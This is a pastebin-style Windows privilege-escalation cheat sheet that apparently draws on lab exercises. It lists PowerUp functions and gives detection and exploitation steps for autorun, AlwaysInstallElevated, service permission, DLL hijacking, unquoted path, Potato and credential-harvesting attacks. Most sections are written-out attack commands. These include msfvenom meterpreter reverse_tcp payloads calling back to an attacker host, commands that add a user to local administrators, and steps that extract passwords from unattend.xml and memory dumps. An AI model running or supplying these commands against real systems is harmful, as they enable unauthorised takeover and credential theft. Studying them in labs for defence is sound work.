Basic/Local Priv Esc

SUBMITTED BY: DevilDawg

DATE: Feb. 24, 2022, 5:50 p.m.

FORMAT: Text only

SIZE: 14.7 kB

Raw Download

HITS: 819

Report
  1. LOCAL PRIVILEGE ESCALATION
  2. Basic Privilege escalation
  4. 1. Service Enumeration
  5. Get-ServiceUnquoted # returns services with unquoted paths that also have a space in the name
  6. Get-ModifiableServiceFile # returns services where the current user can write to the service binary path or its config
  7. Get-ModifiableService # returns services the current user can modify
  8. Get-ServiceDetail # returns detailed information about a specified service
  10. 2. Service Abuse
  11. Invoke-ServiceAbuse # modifies a vulnerable service to create a local admin or execute a custom command
  12. Write-ServiceBinary # writes out a patched C # service binary that adds a local admin or executes a custom command
  13. Install-ServiceBinary # replaces a service binary with one that adds a local admin or executes a custom command
  14. Restore-ServiceBinary # restores a replaced service binary with the original executable
  16. 3. DLL Hijacking
  17. Find-ProcessDLLHijack # finds potential DLL hijacking opportunities for currently running processes
  18. Find-PathDLLHijack # finds service %PATH% DLL hijacking opportunities
  19. Write-HijackDll # writes out a hijackable DLL
  21. 4. Registry Checks
  22. Get-RegistryAlwaysInstallElevated # checks if the AlwaysInstallElevated registry key is set
  23. Get-RegistryAutoLogon # checks for Autologon credentials in the registry
  24. Get-ModifiableRegistryAutoRun # checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns
  26. 5. Miscellaneous Checks
  27. Get-ModifiableScheduledTaskFile # find schtasks with modifiable target files
  28. Get-UnattendedInstallFile # finds remaining unattended installation files
  29. Get-Webconfig # checks for any encrypted web.config strings
  30. Get-ApplicationHost # checks for encrypted application pool and virtual directory passwords
  31. Get-SiteListPassword # retrieves the plaintext passwords for any found McAfee`'s SiteList.xml files
  32. Get-CachedGPPPassword # checks for passwords in cached Group Policy Preferences files
  34. 6. Other Helpers/Meta-Functions
  35. Get-ModifiablePath # tokenizes an input string and returns the files in it the current user can modify
  36. Get-CurrentUserTokenGroupSid # returns all SIDs that the current user is a part of, whether they are disabled or not
  37. Add-ServiceDacl # adds a Dacl field to a service object returned by Get-Service
  38. Set-ServiceBinPath # sets the binary path for a service to a specified value through Win32 API methods
  39. Test-ServiceDaclPermission # tests one or more passed services or service names against a given permission set
  40. Write-UserAddMSI # write out a MSI installer that prompts for a user to be added
  42. 7. Check ALL
  43. Invoke-AllChecks # runs all current escalation checks and returns a report
  45. Autorun
  46. Detection
  48. Windows VM
  50. Open command prompt and type: C:\Users\User\Desktop\Tools\Autoruns\Autoruns64.exe
  51. In Autoruns, click on the ‘Logon’ tab.
  52. From the listed results, notice that the “My Program” entry is pointing to “C:\Program Files\Autorun Program\program.exe”.
  53. In command prompt type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
  54. From the output, notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the “program.exe” file.
  56. Exploitation
  58. Kali VM
  60. Open command prompt and type: msfconsole
  61. In Metasploit (msf > prompt) type: use multi/handler
  62. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
  63. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
  64. In Metasploit (msf > prompt) type: run
  65. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f exe -o program.exe
  66. Copy the generated file, program.exe, to the Windows VM.
  68. Windows VM
  70. Place program.exe in ‘C:\Program Files\Autorun Program’.
  71. To simulate the privilege escalation effect, logoff and then log back on as an administrator user.
  73. Kali VM
  75. Wait for a new session to open in Metasploit.
  76. In Metasploit (msf > prompt) type: sessions -i [Session ID]
  77. To confirm that the attack succeeded, in Metasploit (msf > prompt) type: getuid
  79. **********AlwaysInstallElevated**********
  81. Detection
  83. Windows VM
  85. Open command prompt and type: reg query HKLM\Software\Policies\Microsoft\Windows\Installer
  86. From the output, notice that “AlwaysInstallElevated” value is 1
  87. In command prompt type: reg query HKCU\Software\Policies\Microsoft\Windows\Installer
  88. From the output, notice that “AlwaysInstallElevated” value is 1
  90. exploitation
  92. Kali VM
  94. Open command prompt and type: msfconsole
  95. In Metasploit (msf > prompt) type: use multi/handler
  96. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
  97. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
  98. In Metasploit (msf > prompt) type: run
  99. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
  100. Copy the generated file, setup.msi, to the Windows VM.
  102. Windows VM
  104. Place ‘setup.msi’ in ‘C:\Temp’.
  105. Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi
  106. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
  108. Registry
  109. Detection
  111. Windows VM
  113. Open powershell prompt and type: Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
  114. Notice that the output suggests that user belong to “NT AUTHORITY\INTERACTIVE” has “FullContol” permission over the registry key.
  116. Exploitation
  118. Windows VM
  120. Copy ‘C:\Users\User\Desktop\Tools\Source\windows_service.c’ to the Kali VM.
  122. Kali VM
  124. Open windows_service.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
  125. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_service.c -o x.exe (NOTE: if this is not installed, use 'sudo apt install gcc-mingw-w64')
  126. Copy the generated file x.exe, to the Windows VM.
  128. Windows VM
  130. Place x.exe in ‘C:\Temp’.
  131. Open command prompt at type: reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d c:\temp\x.exe /f
  132. In the command prompt type: sc start regsvc
  133. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
  135. Exec Path
  136. Detection
  138. Windows VM
  140. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\File Permissions Service"
  141. Notice that the “Everyone” user group has “FILE_ALL_ACCESS” permission on the filepermservice.exe file.
  143. Exploitation
  145. Windows VM
  147. Open command prompt and type: copy /y c:\Temp\x.exe "c:\Program Files\File Permissions Service\filepermservice.exe"
  148. In command prompt type: sc start filepermsvc
  149. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
  151. Startup Applications
  152. Detection
  154. Windows VM
  156. Open command prompt and type: icacls.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  157. From the output notice that the “BUILTIN\Users” group has full access ‘(F)’ to the directory.
  159. Exploitation
  161. Kali VM
  163. Open command prompt and type: msfconsole
  164. In Metasploit (msf > prompt) type: use multi/handler
  165. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
  166. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
  167. In Metasploit (msf > prompt) type: run
  168. Open another command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Kali VM IP Address] -f exe -o x.exe
  169. Copy the generated file, x.exe, to the Windows VM. Windows VM
  170. Place x.exe in “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup”.
  171. Logoff.
  172. Login with the administrator account credentials. Kali VM
  173. Wait for a session to be created, it may take a few seconds.
  174. In Meterpreter(meterpreter > prompt) type: getuid
  175. From the output, notice the user is “User-PC\Admin”
  177. DLL Hijacking
  178. Detection
  180. Windows VM
  182. Open the Tools folder that is located on the desktop and then go the Process Monitor folder.
  183. In reality, executables would be copied from the victim’s host over to the attacker’s host for analysis during run time. Alternatively, the same software can be installed on the attacker’s host for analysis, in case they can obtain it. To simulate this, right click on Procmon.exe and select ‘Run as administrator’ from the menu.
  184. In procmon, select "filter". From the left-most drop down menu, select ‘Process Name’.
  185. In the input box on the same line type: dllhijackservice.exe
  186. Make sure the line reads “Process Name is dllhijackservice.exe then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’.
  187. Next, select from the left-most drop down menu ‘Result’.
  188. In the input box on the same line type: NAME NOT FOUND
  189. Make sure the line reads “Result is NAME NOT FOUND then Include” and click on the ‘Add’ button, then ‘Apply’ and lastly on ‘OK’.
  190. Open command prompt and type: sc start dllsvc
  191. Scroll to the bottom of the window. One of the highlighted results shows that the service tried to execute ‘C:\Temp\hijackme.dll’ yet it could not do that as the file was not found. Note that ‘C:\Temp’ is a writable location.
  193. Exploitation
  195. Windows VM
  197. Copy ‘C:\Users\User\Desktop\Tools\Source\windows_dll.c’ to the Kali VM.
  199. Kali VM
  201. Open windows_dll.c in a text editor and replace the command used by the system() function to: cmd.exe /k net localgroup administrators user /add
  202. Exit the text editor and compile the file by typing the following in the command prompt: x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll
  203. Copy the generated file hijackme.dll, to the Windows VM. Windows VM
  204. Place hijackme.dll in ‘C:\Temp’.
  205. Open command prompt and type: sc stop dllsvc & sc start dllsvc
  206. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
  208. BinPath
  209. Detection
  211. Windows VM
  213. Open command prompt and type: C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wuvc daclsvc
  214. Notice that the output suggests that the user “User-PC\User” has the “SERVICE_CHANGE_CONFIG” permission.
  216. Exploitation
  218. Windows VM
  220. In command prompt type: sc config daclsvc binpath= "net localgroup administrators user /add"
  221. In command prompt type: sc start daclsvc
  222. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
  224. Unquoted Service Paths
  225. Detection
  227. Windows VM
  229. Open command prompt and type: sc qc unquotedsvc
  230. Notice that the “BINARY_PATH_NAME” field displays a path that is not confined between quotes.
  232. Exploitation
  234. Kali VM
  236. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
  237. Copy the generated file, common.exe, to the Windows VM.
  239. Windows VM
  241. Place common.exe in ‘C:\Program Files\Unquoted Path Service’.
  242. Open command prompt and type: sc start unquotedsvc
  243. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
  245. Hot Potato
  246. Exploitation
  248. Windows VM
  250. In command prompt type: powershell.exe -nop -ep bypass
  251. In Power Shell prompt type: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
  252. In Power Shell prompt type: Invoke-Tater -Trigger 1 -Command "net localgroup administrators user /add"
  253. To confirm that the attack was successful, in Power Shell prompt type: net localgroup administrators
  255. Configuration Files
  256. Exploitation
  258. Windows VM
  260. Open command prompt and type: notepad C:\Windows\Panther\Unattend.xml
  261. Scroll down to the "Password" property and copy the base64 string that is confined between the "Value" tags underneath it.
  263. Kali VM
  265. In a terminal, type: echo [copied base64] | base64 -d
  266. Notice the cleartext password
  268. Memory
  269. Exploitation
  271. Kali VM
  273. Open command prompt and type: msfconsole
  274. In Metasploit (msf > prompt) type: use auxiliary/server/capture/http_basic
  275. In Metasploit (msf > prompt) type: set uripath x
  276. In Metasploit (msf > prompt) type: run
  278. Windows VM
  280. Open Internet Explorer and browse to: http://[Kali VM IP Address]/x
  281. Open command prompt and type: taskmgr
  282. In Windows Task Manager, right-click on the “iexplore.exe” in the "Image Name" columnand select “Create Dump File” from the popup menu.
  283. Copy the generated file, iexplore.DMP, to the Kali VM.
  285. Kali VM
  287. Place 'iexplore.DMP' on the desktop.
  288. Open command prompt and type: strings /root/Desktop/iexplore.DMP | grep "Authorization: Basic"
  289. Select the Copy the Base64 encoded string.
  290. In command prompt type: echo -ne [Base64 String] | base64 -d
  291. Notice the credentials in the output.
  293. Stuff
  295. PowerUp Misconfiguration Abuse
  296. Powerless (bat version OSCP prepair)
  297. BeRoot General Priv Esc Enumeration Tool
  298. Privesc General Priv Esc Enumeration Tool
  299. FullPowers Restore A Service Account's Privileges
  300. Juicy Potato Abuse SeImpersonate or SeAssignPrimaryToken Privileges for System Impersonation, warning Works only until Windows Server 2016 and Windows 10 until patch 1803
  301. Lovely Potato Automated Juicy Potato, warning Works only until Windows Server 2016 and Windows 10 until patch 1803
  302. PrintSpoofer Exploit the PrinterBug for System Impersonation
  303. Pray Works for Windows Server 2019 and Windows 10
  304. RoguePotato Upgraded Juicy Potato
  305. Pray Works for Windows Server 2019 and Windows 10
  306. Abusing Token Privileges
  307. SMBGhost CVE-2020-0796
comments powered by Disqus